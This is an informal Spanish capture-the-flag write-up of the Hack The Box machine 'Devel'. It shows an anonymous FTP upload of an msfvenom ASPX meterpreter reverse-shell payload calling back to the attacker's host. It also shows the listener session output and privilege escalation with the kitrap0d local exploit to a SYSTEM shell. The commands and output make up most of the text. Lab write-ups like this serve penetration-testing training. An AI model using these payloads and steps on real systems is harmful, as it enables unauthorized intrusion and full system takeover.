Ok, esta la hice casi solito…  ja solo me fallo la sintax de msfvenon.

1 probe

La maquina se llama devel, supongo developer.  Solo con sparta te dice de entrada que tienes un ftp anonimo disponible, revise y puedes subir archivos y ejecutarlos.

Con eso puedo acceder al ftp y subir archivos

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx > devel2.aspx
msf exploit(multi/handler) > use multi/handler
Y PONES EL MISMO PAYLOAD QUE HABIAS PUESTO
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
show options

y luego ejecutar el archivo y se conecta.

lo ejecutas yendo a su dirección http://ip/elarchivoquesubiste.

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.9:1234 
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.9:1234 -> 10.10.10.5:49189) at 2018-05-31 18:44:33 +0100

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...

Desde ahi puedes usar el local exploit suggester.

msf exploit(multi/handler) > use local_exploit_suggester

En mi caso usé

msf exploit(windows/local/ms10_015_kitrap0d) > show options

Y ya tienes root

meterpreter > shell 
Process 3760 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami 
whoami 
nt authority\system

todos felices.